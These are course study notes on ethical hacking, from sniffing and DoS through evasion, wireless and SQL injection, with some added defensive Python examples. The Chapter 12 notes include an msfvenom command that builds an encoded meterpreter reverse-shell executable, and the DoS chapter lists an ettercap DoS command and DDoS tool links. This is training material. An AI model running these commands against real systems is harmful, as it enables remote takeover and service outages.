BlackEnergy / 2 / 3 - malware that attacks industrial control workstations

Encrypted rootkit payload

Help file in Russian

It uses HTTP basic authentication as a password protection scheme to protect the botnet. Its configuration file enables a high level of customization of the denial-of-service attack, allowing the form of denial-of-service and the packet size and frequency to be configured. Its attacks include ICMP ping flooding, TCP SYN attacks, UDP flooding, HTTP GET request flooding, DNS flooding, and basic binary data flooding.


BlackEnergy 2

  • Kernel mode driver

  • Process injection

  • Privilege escalation based on ms08-025


BlackEnergy 3

  • 2015 Ukraine power grid attacks

  • Later evolved into the GreyEnergy malware


Analyzing Packers
UPX

UPX is a free, portable, extendable, high-performance executable packer for several executable formats.
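Added example (Python), not from the course or these notes: the first-pass triage an analyst runs on an executable before reaching for Ghidra. It computes Shannon entropy per section and applies two heuristics: UPX leaves its own section names behind, and packers or crypters that rename sections still leave a high-entropy blob where code should be. The section contents are constructed stand-ins (repeated x86 prologue bytes, a DOS-stub string, os.urandom data); on a real PE you would get them from a parser such as pefile.

```python
"""Section-entropy triage for packed executables (added example)."""
import math
import os
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def classify_section(name: str, data: bytes) -> str:
    """Triage heuristics. Compressed or encrypted data sits near 8 bits/byte; native code
    and ASCII are usually well under 6.5; zero-filled sections are near 0."""
    ent = shannon_entropy(data)
    if name.upper().startswith("UPX"):
        return "packed (UPX section name)"
    if ent > 7.2:
        return "packed/encrypted (high entropy)"
    if ent < 1.0:
        return "padding or uninitialised"
    return "plain code/data"


# Constructed sections standing in for the output of a PE parser.
SAMPLE_SECTIONS = {
    ".text":  b"\x55\x8b\xec\x83\xec\x10\x53\x56\x57\x8b\x7d\x08" * 200,  # repeated prologue bytes
    ".rdata": b"This program cannot be run in DOS mode.\r\n" * 50,
    "UPX1":   os.urandom(4096),      # compressed payload, betrayed by its name
    "crypt0": os.urandom(4096),      # renamed packer section, betrayed only by entropy
    ".bss":   b"\x00" * 4096,
}


def triage(sections: dict) -> dict:
    """Map each section name to its classification."""
    return {name: classify_section(name, data) for name, data in sections.items()}


if __name__ == "__main__":
    for name, data in SAMPLE_SECTIONS.items():
        print(f"{name:8} {shannon_entropy(data):5.2f}  {classify_section(name, data)}")
```

A high-entropy section is a hint, not proof: legitimate installers embed compressed resources too, so the next step is to confirm an unpacking stub (a tiny .text that jumps into the blob) before running the sample in a sandbox to let it unpack itself.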

Ghidra: reverse engineering tools developed by the NSA

A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the cybersecurity mission

***********************************************************************************************************

Chapter 8: Ethical Hacking: Sniffers, By: Lisa Bock

Sniffing  or Packet Analysis

Tools

  • Wireshark

Npcap

  • Packet capture driver for Windows from the Nmap project; bundled with the Wireshark installer


Phases

  • Gather

  • Decode

  • Display

  • Analyze

    • Is the traffic normal

      • TCP flags

      • Malware Signatures

      • Traffic in clear text

      • Router advertisements 

OSI Model


Frame

OSI model in wireshark 

Active Attacks:

  • Denial of Service DoS

  • Buffer overflow

  • Password attack

Tapping in to Data Stream

  • 2 basic types of ethernet environments

    • Shared or hub based

    • Switched network

Wireless

  • 802.11b/g/n act like a hub


IPv4 Vs IPv6


MAC Attacks 

MACOF:

┌──(kali㉿kali)-[~]

└─$ sudo macof

Vulnerable protocols

  • STP = Spanning Tree Protocol 

    • Attacks

      • DoS using BPDU Flood

  • CDP = Cisco Discovery Protocol

    • Attacks

      • Send bogus CDP to other devices

      • Flood CDP & cause a DoS

  • DTP

  • DHCP

  • HSRP

  • ISL

  • VTP

  • 802.1Q

  • 802.1X

Macof (MAC flooding) defense

  • Use switch port security (limit the number of MAC addresses learned per port)

MAC spoofing defense

  • MAC spoofing is used in man-in-the-middle attacks

  • Filter on trusted IP and MAC address pairs


DHCP

DHCP process

  • Discover

  • Offer

  • Request

  • Acknowledge


VLAN Access Control List VACL

  • Access control on the switch not the router

ARP

Ettercap

  • Tool in Kali Linux

  • Used in man in the middle attack


┌──(kali㉿kali)-[~]

└─$ ettercap -G
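Added example (Python), not from the course or these notes: the defensive side of what Ettercap does. It watches ARP replies and raises an alert when an IP address starts answering from a different MAC, or when one MAC claims several IPs (the signature of a machine poisoning both the gateway and a victim), and it supports the "trusted IP and MAC" allow-list mentioned under the defenses. The capture is a constructed list of (time, sender IP, sender MAC) tuples in the 10.0.2.0/24 lab range used in these notes; on a real network the records would come from tcpdump -e arp or a scapy sniff.

```python
"""ARP-poisoning detector over ARP reply records, arpwatch-style (added example)."""
from collections import defaultdict

# Constructed capture: (timestamp, sender IP, sender MAC) from ARP replies/announcements.
SAMPLE_ARP = [
    (0.0, "10.0.2.1",  "52:54:00:12:35:00"),   # gateway
    (0.5, "10.0.2.4",  "08:00:27:aa:bb:cc"),   # victim host
    (1.0, "10.0.2.15", "08:00:27:11:22:33"),   # attacker box
    (5.0, "10.0.2.1",  "08:00:27:11:22:33"),   # gateway "moves" to the attacker's MAC
    (5.1, "10.0.2.4",  "08:00:27:11:22:33"),   # and so does the victim: MITM on both sides
    (6.0, "10.0.2.1",  "08:00:27:11:22:33"),   # repeated poison reply
]


def detect_arp_spoof(records, trusted=None) -> list:
    """Return alert strings for IPs whose MAC changes and for MACs claiming several IPs.
    `trusted` is an optional {ip: mac} allow-list; a trusted binding never moves, so
    every reply that contradicts it is reported."""
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    ip_to_mac = dict(trusted)
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in records:
        mac = mac.lower()
        prev = ip_to_mac.get(ip)
        if prev is None:
            ip_to_mac[ip] = mac                       # first sighting: learn it
        elif prev != mac:
            alerts.append(f"t={ts}: {ip} changed from {prev} to {mac}")
            if ip not in trusted:
                ip_to_mac[ip] = mac                   # learned bindings follow the change
        mac_to_ips[mac].add(ip)
    for mac, ips in mac_to_ips.items():
        if len(ips) > 1:
            alerts.append(f"{mac} claims {len(ips)} IPs: {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for line in detect_arp_spoof(SAMPLE_ARP, trusted={"10.0.2.1": "52:54:00:12:35:00"}):
        print(line)
```

Without the allow-list the detector only knows that something changed; with the gateway pinned it can say which side is lying, which is the difference between an informational log line and a page to the on-call analyst.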


Old websites

DNS

To prevent DNS cache poisoning

  • Enable cache locking (a Windows DNS Server setting that stops cached records from being overwritten before their TTL expires)


Sniffing Tools and Techniques

Tools

Linux Tools

  • Tcpdump

  • Ettercap

  • Dsniff


Windows - WhoFi

***********************************************************************************************************


Chapter 9: Ethical Hacking: Social Engineering  By: Lisa Bock


Social Engineering Techniques 

  • Phone phishing

  • Online recon

  • Dumpster diving

  • Shoulder surfing

  • Simple persuasion

Catfishing

  • Poses as love interest

  • Lures you into a relationship 

Browser

  • Privacy most important 

  • TOR browser

Extensions or Addons 

  • Auto update enabled 

Reputation Risk

  • Use of social platform 


Information Collection 

  • Identity theft

  • Report fake account in facebook

Penetration testing with social Engineering

  • Phishing emails

  • Dangerous websites 

  • Fake Call 

Pentesting with SET - Social Engineering Toolkit

  • Download the toolkit or use with kali linux

  • SET - Crafts the bait

  • Metasploit - creates the exploit



The Social-Engineer Toolkit (SET)

The Social-Engineer Toolkit (SET) - TrustedSec 


https://www.trustedsec.com/


Spamhaus
  • https://www.spamhaus.org/statistics/spammers/


Desktop File shredder File Shredder
  • https://www.fileshredder.org/

***********************************************************************************************************

Chapter 10 : Ethical Hacking: Denial of Service, By Malcolm Shore

Understanding DoS

Tools

  • Digital Attack Map
  • https://www.digitalattackmap.com/

Attack Types:

  • DoS

  • DDoS

Network Based attacks

  • TCP SYN flood 

  • Smurf (ICMP) flood

  • UDP flood

  • ARP flood

  • DNS reflection 

Wireless Attacks

  • De-authentication

  • Routing congestion

Application Attacks

  • HTTP services

  • FTP service

  • SIP services

Infrastructure of DoS



┌──(kali㉿kali)-[~]

└─$ hping3 -h 


HPing3 Cheatsheet ≈ Packet Storm

https://packetstormsecurity.com/files/97414/HPing3-Cheatsheet.html


https://dl.packetstormsecurity.net/papers/general/hping3_cheatsheet_v1.0-ENG.pdf


Hyenae download | SourceForge.net

https://github.com/r-richter/hyenae


 Hyenae is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant. 


LOIC Approach

https://github.com/NewEraCracker/LOIC

https://sourceforge.net/projects/loic/


Ettercap 

┌──(kali㉿kali)-[~]

└─$ ettercap -P list


ettercap -TQP dos_attack


ettercap -G


┌──(kali㉿kali)-[~]

└─$ service --status-all | more

ntpdos

Denial of service using NTP servers to amplify attacks

It appears someone is using an attack vector like this to DDOS CloudFlare

https://github.com/vpnguy-zz/ntpdos

GitHub - vpnguy-zz/ntpdos: Create a DDOS attack using NTP servers


Memcached

Free & open source, high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.

https://memcached.org/



 Memcrashed-DDoS-Exploit

This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io

https://github.com/649/Memcrashed-DDoS-Exploit


GitHub - 649/Memcrashed-DDoS-Exploit: DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API

Wireless DoS

Airmon-ng


https://www.aircrack-ng.org/doku.php?id=airmon-ng


┌──(kali㉿kali)-[~]

└─$ sudo airmon-ng


Application DoS

goldeneye

https://www.kali.org/tools/goldeneye/

GoldenEye is an HTTP DoS test tool. It can be used to test whether a site is susceptible to Denial of Service (DoS) attacks: it opens many parallel connections against a URL to check whether the web server can be exhausted.


OWASP Top Ten

https://owasp.org/www-project-top-ten/


Ransomware

Cryptolocker Ransomware

  • Distributed by botnets

  • Drops randomly generated name

  • Inserts startup command into registry

Post Encryption 

  • Ransom Message displayed

  • Countdown timer started

  • If payment not received, files are deleted 

Paying Ransom

  • Payment of the ransom is made using bitcoins. 

  • Other variants use alternative anonymous payment methods, such as U.CASH, CASHU, or prepaid cash money cards. 

  • Once the victim pays the ransom, a transaction ID is provided. 

  • The victim can then enter this into the Cryptolocker program that is running.

  •  The private key is then sent to the victim, and the decryption process begins.

Mitigation Techniques

Mitigation by design

  • Priority based servicing 

    • Priority Management

    • Discard low priority

    • Aggregate based congestion control [ACC]


  • Egress filtering

    • Packet inspection

    • Detect bad packets


  • Ingress filtering 

    • Malicious packet detection

    • Network context

Operational mitigation

  • IP address verification

    • Source address spoofing

    • Real Time detection

    •  Real time traceback 


  • Rate limiting

  • ACLs

  • Detecting known malicious threats

    • Characterizing normal

    • Metrics to reflect normal boundaries 

  • Detecting traffic anomalies
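Added example (Python), not from the course or these notes: the rate-limiting item from the operational mitigations above, implemented as a token bucket per source IP, which is the algorithm behind most router and API-gateway rate limiters. The bucket refills at a steady rate up to a burst ceiling, so a legitimate client's short bursts pass while a flood source is cut down to the refill rate. The clock is passed in explicitly so the behaviour is reproducible; the traffic in SAMPLE_TRAFFIC is constructed (one flood source at 100 requests/s beside a normal client at 2 requests/s).

```python
"""Token-bucket rate limiter per source IP, with an explicit clock (added example)."""


class TokenBucket:
    """`rate` tokens are added per second up to `burst`; each request spends one token."""

    def __init__(self, rate: float, burst: int, now: float):
        self.rate, self.burst = rate, burst
        self.tokens = float(burst)
        self.last = now

    def allow(self, now: float) -> bool:
        # refill for the time elapsed since the last decision, capped at the burst size
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False


class PerSourceLimiter:
    """One bucket per client IP, created lazily on first sight."""

    def __init__(self, rate: float, burst: int):
        self.rate, self.burst = rate, burst
        self.buckets = {}

    def allow(self, src_ip: str, now: float) -> bool:
        bucket = self.buckets.get(src_ip)
        if bucket is None:
            bucket = self.buckets[src_ip] = TokenBucket(self.rate, self.burst, now)
        return bucket.allow(now)


def simulate(requests, rate: float = 5.0, burst: int = 10) -> dict:
    """requests: iterable of (timestamp, src_ip) in time order.
    Returns {ip: (allowed, dropped)}."""
    limiter = PerSourceLimiter(rate, burst)
    stats = {}
    for ts, ip in requests:
        ok = limiter.allow(ip, ts)
        allowed, dropped = stats.get(ip, (0, 0))
        stats[ip] = (allowed + 1, dropped) if ok else (allowed, dropped + 1)
    return stats


# Constructed traffic: a flood source at 100 req/s for 2 s next to a normal client at 2 req/s.
SAMPLE_TRAFFIC = sorted(
    [(i / 100.0, "198.51.100.7") for i in range(200)]
    + [(i / 2.0, "203.0.113.5") for i in range(4)]
)

if __name__ == "__main__":
    for ip, (allowed, dropped) in simulate(SAMPLE_TRAFFIC).items():
        print(f"{ip:14} allowed={allowed:3} dropped={dropped:3}")
```

Per-source buckets only help when the source address is real; a spoofed SYN flood spreads across millions of addresses and never fills any one bucket, which is why source address validation (the 12 recommendations in SP 800-189 below) sits ahead of rate limiting in the list.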

Repose

 is an open-source, RESTful, middleware platform that transparently integrates with your existing infrastructure. Repose provides highly scalable and extensible solutions to API processing tasks such as authentication, rate limiting, API validation, HTTP request logging, and much more.

https://repose.atlassian.net/wiki/spaces/REPOSE/overview

Project Shield

Project Shield, created by Google Cloud and Jigsaw and powered by Google Cloud Armor, provides free unlimited protection against DDoS attacks, a type of digital attack used to censor information by taking websites offline

https://projectshield.withgoogle.com/landing

Peershark

https://github.com/pratiknarang/peershark


https://ieeexplore.ieee.org/document/9642767


https://www.ieee-security.org/TC/SPW2014/papers/5103a108.PDF

NIST

Resilient Interdomain Traffic Exchange: BGP Security and DDoS Mitigation (NIST SP 800-189)

https://csrc.nist.gov/publications/detail/sp/800-189/final

  • 39 control plane and BGP security recommendations

  • 26 DDoS mitigation recommendations

    • 12 recommendations for source address validations

    • 7 recommendations for port Filtering 

    • 1 recommendation on rate limiting

    • 6 recommendations on flow specification blackholing


IOT Distributed IDS

***********************************************************************************************************

Chapter 11: Ethical Hacking: Session Hijacking By: Malcolm Shore

Intro to Session Hijacking


  • Stateless HTTP

  • Session IDs

  • PHP session array


Websocketd

http://websocketd.com/


https://github.com/joewalnes/websocketd

Establishing Man in the Middle

  • Web proxy

  • ARP poisoning

  • Malicious Wifi


Cookie hijacking 

Tampermonkey:-

https://www.tampermonkey.net/


https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en
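An added example, not from the course notes, of a defender's check for the session-ID and cookie-hijacking points above: it audits Set-Cookie headers for the attributes that let a session cookie be read by script in the page, sent in clear, or guessed. The cookie name and header values are constructed.

```python
# Added example (not from the course notes): audit Set-Cookie headers for the
# properties that make a session cookie easy to steal or guess. Header values
# and the cookie name are constructed samples (Python 3.8+ for SameSite).
import math
from collections import Counter
from http.cookies import SimpleCookie
from typing import Dict, List

def entropy_bits(value: str) -> float:
    """Rough total Shannon entropy of the characters in `value`, in bits."""
    if not value:
        return 0.0
    n = len(value)
    per_char = -sum(c / n * math.log2(c / n) for c in Counter(value).values())
    return per_char * n

def audit_set_cookie(header: str, https_site: bool = True) -> Dict[str, List[str]]:
    """Return {cookie_name: [findings]} for one Set-Cookie header value."""
    jar = SimpleCookie()
    jar.load(header)
    report: Dict[str, List[str]] = {}
    for name, morsel in jar.items():
        findings = []
        if not morsel["httponly"]:
            findings.append("missing HttpOnly: readable by script running in the page")
        if https_site and not morsel["secure"]:
            findings.append("missing Secure: may be sent over plain HTTP")
        if morsel["samesite"].lower() not in ("lax", "strict"):
            findings.append("missing SameSite: attached to cross-site requests")
        if entropy_bits(morsel.value) < 64:
            findings.append("low-entropy value: session ID may be guessable")
        report[name] = findings
    return report

# Constructed headers: one typical weak cookie, one with the mitigations applied.
WEAK_HEADER = "PHPSESSID=abc123; Path=/"
HARDENED_HEADER = ("PHPSESSID=k3n9p2q7r4s8t1u6v0w5x2y8z3; Path=/; "
                   "HttpOnly; Secure; SameSite=Lax")

if __name__ == "__main__":
    for h in (WEAK_HEADER, HARDENED_HEADER):
        print(audit_set_cookie(h))
```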

Subterfuge-Framework / Framework for Man-In-The-Middle attacks

https://github.com/Subterfuge-Framework/Subterfuge

ARP poisoning


Cain and Abel

https://sectools.org/tool/cain/

PuTTY

https://www.putty.org/

PuttyRider

Hijack Putty sessions in order to sniff conversation and inject Linux commands.

https://github.com/seastorm/PuttyRider


DNS Hijacking

Cloud hijacking 

API Key Hijack

Hijacking the Physical World

Vehicle wiring Diagram

Parrot Drone

  • UDP 5554 - telemetry data

  • TCP 5555 - streaming video

  • UDP 5556 - flight commands

  • UDP 5559 - critical data


Acrylic Wi-Fi Home – WiFi Scanner

https://www.acrylicwifi.com/en/wlan-wifi-wireless-network-software-tools/wlan-scanner-acrylic-wifi-free/

Enhanced Kamkar attack

  • Telnet connection

  • Add firewall rule

  • Laptop application to control drone

Photography Drone

  • 2.4GHz radio control link

  • XBee telemetry link

  • 5.8GHz streaming video link

Telemetry Channel attacks 

  • Detect all ZigBee stations

  • Delete the MAC address and set the attacker's MAC address

  • Pair victim with attacker

***********************************************************************************************************

Chapter 12: Ethical Hacking: Evading IDS, Firewalls, and Honeypots. By: Malcolm Shore

Firewall

Windows Firewall

  • Windows Defender Firewall Properties 

    • Public Profile

      • Inbound connections = Block all connections

      • Settings -> Customize -> Allow unicast response = No {set to No for a safer defensive posture}

      • Logging->Customize->

        • Log Dropped packets = Yes

        • Log Successful connections = Yes

Windows DNS Log Analyser


https://support.moonpoint.com/reviews/software/windows/network/dns/WDLA/

Linux Firewall

iptables  

┌──(kali㉿kali)-[~]

└─$ sudo iptables -L -n -v


┌──(kali㉿kali)-[~]

└─$ cat /var/log/kern.log
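An added example, not from the course notes, that reads the kind of entries an iptables LOG rule leaves in /var/log/kern.log (the file listed above) and summarises what was dropped per source and per destination port. The log lines are constructed in the netfilter LOG format, and "IPT-DROP" is an assumed --log-prefix, not one the notes define.

```python
# Added example (not from the course notes): summarise iptables LOG entries
# from /var/log/kern.log. Lines are constructed samples in the netfilter LOG
# format; "IPT-DROP" is an assumed --log-prefix.
import re
from collections import Counter, defaultdict
from typing import Dict, Iterable, Optional, Tuple

SAMPLE_KERN_LOG = """\
Mar  3 12:00:01 kali kernel: [ 1234.567890] IPT-DROP: IN=eth0 OUT= SRC=10.0.2.2 DST=10.0.2.15 LEN=60 TTL=64 ID=12345 DF PROTO=TCP SPT=51234 DPT=22 SYN
Mar  3 12:00:02 kali kernel: [ 1235.000001] IPT-DROP: IN=eth0 OUT= SRC=10.0.2.2 DST=10.0.2.15 LEN=60 TTL=64 ID=12346 DF PROTO=TCP SPT=51235 DPT=23 SYN
Mar  3 12:00:03 kali kernel: [ 1236.000002] IPT-DROP: IN=eth0 OUT= SRC=10.0.2.2 DST=10.0.2.15 LEN=60 TTL=64 ID=12347 DF PROTO=TCP SPT=51236 DPT=445 SYN
Mar  3 12:00:04 kali kernel: [ 1237.000003] IPT-DROP: IN=eth0 OUT= SRC=10.0.2.9 DST=10.0.2.15 LEN=32 TTL=64 ID=1 PROTO=UDP SPT=40000 DPT=53
Mar  3 12:00:05 kali kernel: [ 1238.000004] usb 1-1: new high-speed USB device number 3 using xhci_hcd
"""

# "<prefix>: " right after the kernel timestamp, then KEY=VALUE fields with SRC=.
LOG_RE = re.compile(r"kernel: \[\s*[\d.]+\] (?P<prefix>[\w-]+): (?P<fields>.*SRC=.*)$")

def parse_netfilter_line(line: str) -> Optional[Tuple[str, Dict[str, object]]]:
    """Return (log prefix, {field: value}) for a netfilter LOG line, else None."""
    m = LOG_RE.search(line)
    if not m:
        return None
    fields: Dict[str, object] = {}
    for tok in m.group("fields").split():
        if "=" in tok:
            k, v = tok.split("=", 1)
            fields[k] = v
        else:
            fields[tok] = True          # bare flags such as DF or SYN
    return m.group("prefix"), fields

def summarize_drops(lines: Iterable[str], prefix: str = "IPT-DROP",
                    min_ports: int = 3) -> Dict[str, object]:
    """Count logged packets per source and per (proto, dport); list sources
    whose dropped packets touched at least `min_ports` distinct ports."""
    by_src: Counter = Counter()
    by_port: Counter = Counter()
    ports = defaultdict(set)
    for line in lines:
        parsed = parse_netfilter_line(line)
        if parsed is None or parsed[0] != prefix:
            continue
        f = parsed[1]
        by_src[f["SRC"]] += 1
        by_port[(f.get("PROTO"), f.get("DPT"))] += 1
        ports[f["SRC"]].add(f.get("DPT"))
    suspects = sorted(s for s, seen in ports.items() if len(seen) >= min_ports)
    return {"by_src": by_src, "by_port": by_port, "scan_suspects": suspects}

if __name__ == "__main__":
    print(summarize_drops(SAMPLE_KERN_LOG.splitlines()))
```

On a real host, feed it `open("/var/log/kern.log")` instead of the sample string.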


Networking using GNS3


GNS3 : https://www.gns3.com/


All in one:- 

https://github.com/GNS3/gns3-gui/releases


  • Tour of GNS3

  • Basic operation

  • Routed network

  • ASA secure enclave


Honeypots

  • Target to lure attackers 

    • Identify and prosecute

    • Monitor and analyze

  • Types of honeypots

    • Low interaction 

    • High interaction

    • Honeynets

  • Sinkhole


https://www.honeynet.org/projects/

This page contains a list of tools and services that we use on a regular basis. Most of these tools have been created by our members and participating GSoC students, but some are also external and not affiliated with the Honeynet Project. We hope you find the below link collection useful.

Protection from Intrusion

  • Blacklist the websites

  • Whitelist

    • Just add the sites to be allowed

    • This is easier than maintaining the blacklist 

Snort 

  • Log and Alert output 

    • alert_fast

    • alert_full

    • Default log directory /var/log/snort/

    • alert_syslog

Suricata

Suricata is the leading independent open source threat detection engine. By combining intrusion detection (IDS), intrusion prevention (IPS), network security monitoring (NSM) and PCAP processing, Suricata can quickly identify, stop, and assess even the most sophisticated attacks.

https://suricata.io/

Security Onion

Security Onion Solutions, LLC is the creator and maintainer of Security Onion, a free and open platform for threat hunting, network security monitoring, and log management. Security Onion includes best-of-breed free and open tools including Suricata, Zeek, Wazuh, the Elastic Stack and many others. 

https://securityonionsolutions.com/

Evasion Techniques

Msfvenom

┌──(kali㉿kali)-[~]

└─$ msfvenom --list encoders  


msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=10.0.2.15 LPORT=4444 -e x86/shikata_ga_nai -i 100 -f exe -o venom.exe


Andromeda's Five Star Custom Packer – Hackers' Tactics Analyzed

Packer-based malware is malware which is modified in the runtime memory using different and sophisticated compression techniques. Such malware is hard to detect by known malware scanners and anti-virus solutions. In addition, it is a cheap way for hackers to recreate new signatures for the same malware on the fly simply by changing the encryption/packing method. Packers themselves are not malware; attackers use this tactic to obfuscate the code’s real intention.

https://blog.morphisec.com/andromeda-tactics-analyzed


***********************************************************************************************************

Chapter 13:  Ethical Hacking: Hacking Web Servers and Web Applications, By Malcolm Shore

Introduction to Web Servers

Return codes from web servers

  • 200 - processed OK

  • 400 - bad request

  • 403 - unauthorized

  • 404 - not found

  • 500 - internal server error 

Tools

http://websocketd.com/

Google QUIC

burpsuite | Kali Linux Tools

https://www.kali.org/tools/burpsuite/


Testing vulnerable website

http://zero.webappsecurity.com/

OWASP WebGoat - Learn the hack - Stop the attack

https://owasp.org/www-project-webgoat/

Fingerprinting 

whatweb

┌──(kali㉿kali)-[~]

└─$ whatweb http://zero.webappsecurity.com

http://zero.webappsecurity.com [200 OK] Apache, Bootstrap, Content-Language[en-US], Country[UNITED STATES][US], HTML5, HTTPServer[Apache-Coyote/1.1], IP, JQuery[1.8.2], Script[text/javascript], Title[Zero - Personal Banking - Loans - Credit Cards], UncommonHeaders[access-control-allow-origin], X-UA-Compatible[IE=Edge]


┌──(kali㉿kali)-[~]

└─$ whatweb -l | more   

Web Security Dojo

A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo

https://www.mavensecurity.com/resources/web-security-dojo

***********************************************************************************************************

Chapter 14: Ethical Hacking: Wireless Networks, by Malcolm Shore


Wi-Fi Networks

Speed Standards

Wireless security

  • Network key

  • Internet login

  • MAC filtering

  • Encryption - WEP, WPA, and WPA2

  • Connection - WPS

Signal aspects of wireless

  • Performance in dBi is against a benchmark 

  • Gain is expressed in dBi (decibels relative to an isotropic antenna); the higher the figure, the more powerful the antenna and the more reliable the communication. Sometimes performance is expressed in dBm, which is absolute signal power. dBm is related to milliwatts by the equation dBm = 10 × log10(P / 1 mW), where P is the power in milliwatts.

  • When transmitting, a positive number represents better performance, or gain, relative to the benchmark, and a negative number means lower performance, or loss. 1,000 milliwatts, or 30 dBm, is rated as a good transmitter.

  • For reception, the opposite is true. We want to be able to receive weaker signals, and a good antenna should be able to operate down to about -90 dBm.

Yagi antenna or fishbone antenna

Parabolic antenna

wifite | Kali Linux Tools

https://www.kali.org/tools/wifite/


reaver | Kali Linux Tools

https://www.kali.org/tools/reaver/

  • Reaver 

  • Wash

Airmon-ng

https://www.aircrack-ng.org/doku.php?id=airmon-ng

Dragonblood

https://wpa3.mathyvanhoef.com/


Wifi Pineapple:

WiFi Pineapple - Hak5

fern

fern-wifi-cracker | Kali Linux Tools

https://www.kali.org/tools/fern-wifi-cracker/

MetaGeek | inSSIDer - Defeat Slow Wi-Fi

https://www.metageek.com/inssider/



Bluetooth

  • Serial Port Profile SPP

  • Human Interface Device Profile HID

  • Hands-Free Profile HFP

  • Advanced Audio Distribution Profile A2DP

  • Audio/Video Remote Control Profile AVRCP


┌──(kali㉿kali)-[~]

└─$ lsusb



┌──(kali㉿kali)-[~]

└─$ sudo bluelog -l



┌──(kali㉿kali)-[~]

└─$ btscanner 


┌──(kali㉿kali)-[~]

└─$ fang -h

***********************************************************************************************************

Chapter 15: Ethical Hacking: Mobile Devices and Platforms, by Malcolm Shore

Mobile technology

  • OWASP Mobile Security methodologies 

  • Effective testing

    • Static analysis

      • App source code

      • Reverse engineering

      • Clone runtime environment

      • Identify

        • All network interfaces

        • Network protocols

        • Component interactions

        • Data access

        • App interfaces

      • Encryption

      • Pinning

        • Certificate

        • Public key


    • Dynamic analysis

      • Changes to device storage

      • Info transmitted

      • Web app testing


    • Forensic analysis

    • Virtualization


OWASP Mobile Security Testing Guide

OWASP flagship project provides a security standard for mobile apps (OWASP MASVS) and a comprehensive testing guide (OWASP MSTG) that covers the processes, techniques, and tools used during a mobile app security test, as well as an exhaustive set of test cases that enables testers to deliver consistent and complete results.

https://owasp.org/www-project-mobile-security-testing-guide/


Android

  • Builds on the Linux security model 

  • “*.dex” extensions are Dalvik executable files.

Download Android Studio & App Tools

https://developer.android.com/studio

Apktool - A tool for reverse engineering 3rd party, closed, binary Android apps.

https://ibotpeaches.github.io/Apktool/


Apk Files

https://www.apkfiles.com/


dex2jar download | SourceForge.net

https://sourceforge.net/projects/dex2jar/

dex2jar | Kali Linux Tools

https://www.kali.org/tools/dex2jar/


GitHub - skylot/jadx: Dex to Java decompiler

https://github.com/skylot/jadx


OWASP Security Shepherd

The OWASP Security Shepherd Project is a web and mobile application security training platform. Security Shepherd has been designed to foster and improve security awareness among a varied skill-set demographic. The aim of this project is to take AppSec novices or experienced engineers and sharpen their penetration testing skill set to security expert status.

https://owasp.org/www-project-security-shepherd/


***********************************************************************************************************


Chapter 16: Ethical Hacking: Hacking IoT Devices, by Luciano Ferrari

Internet of Things 


IoT Attacks 

  • Lack of security

  • Vulnerable interfaces

  • Lack of firmware updates


OWASP Internet of Things

https://owasp.org/www-project-internet-of-things/

https://wiki.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Top_10




Type of attacks

  • DDoS

  • Rolling code attack

  • BlueBorne attack

  • Jamming attacks

  • Backdoor

  • Sybil

  • Side channel 

Hacking Methodology

  • Information gathering

  • Vulnerability scanning

  • Launch attack

  • Gain access

  • Maintain access 

***********************************************************************************************************

Chapter 17 :Ethical Hacking: Cryptography, by Stephanie Domas

Cryptography

  • Symmetric Cryptography 

  • Asymmetric

  • Hashing 

Ciphers

  • Plaintext 

  • Block

  • Stream

DES - Data Encryption Standard

  • Replaced by AES

AES - Advanced Encryption Standard

RC - Rivest Cipher

  • Symmetric

  • Designed by Ron Rivest

  • RC4

  • RC5

  • RC6

ECC - Elliptic Curve Cryptography

Diffie-Hellman

Hybrid Cipher

  • Symmetric & Asymmetric combined together 

Hashing

  • One way function

  • Used in passwords

MD5 - Message Digest

  • 128-bit output

SHA - Secure Hash Algorithm

  • 160-bit output (SHA-1)

Digital Certificates

  • Authorized Agency Verification 

  • CA - Certificate authority verification

  • Digital Certificate X.509

    • Version

    • Serial no

    • Algorithm ID

    • Issuer

    • Validity

DSA - Digital Signature Algorithm 

PKI - Public Key Infrastructure

  • Certificate management system

  • Digital certificate 

  • CRL - certificate revocation list

  • CA - certificate authority  

  • RA - registration authority

  • End user



New Secure Protocols

  • S/MIME - Secure MIME - added digital signature, public key encryption to emails

  • PGP - Pretty good privacy - similar to PKI

  • SSH - Secure Shell - encrypted channel for remote command execution on a system.

Real world exploits

  • Distributed.net 

  • Electronic Frontier Foundation (EFF)

    • https://www.eff.org

  • Heartbleed

    • https://heartbleed.com/

  • POODLE - "Padding Oracle On Downgraded Legacy Encryption"

  • DROWN - Decrypting RSA with Obsolete and Weakened eNcryption

    • https://drownattack.com/

  • FREAK ("Factoring RSA Export Keys")

***********************************************************************************************************

Chapter 18: Ethical Hacking: Cloud Computing, by Daniel Lachance

Cloud Overview

  • XaaS

  • SaaS

  • PaaS

  • IaaS

Cloud identity Management 

  • MFA Multi Factor Authentication 

  • RBAC Role-Based Access Control


Cloud High Availability

  • Business Continuity and Risk Management

    • Identify assets

    • Identify assets threats

    • Identify threat likelihood

  • Data Replication 

  • Application Resiliency 

GDPR General Data Protection Regulation 

PCI DSS - Payment Card Industry Data Security Standard

***********************************************************************************************************


Chapter 19: Ethical Hacking: SQL Injection, by Malcolm Shore

Testing SQL Injection

OWASP Security Shepherd

https://owasp.org/www-project-security-shepherd/


┌──(kali㉿kali)-[~]

└─$ sudo service mysql start


┌──(kali㉿kali)-[~]

└─$ sudo mysql -u root -p 

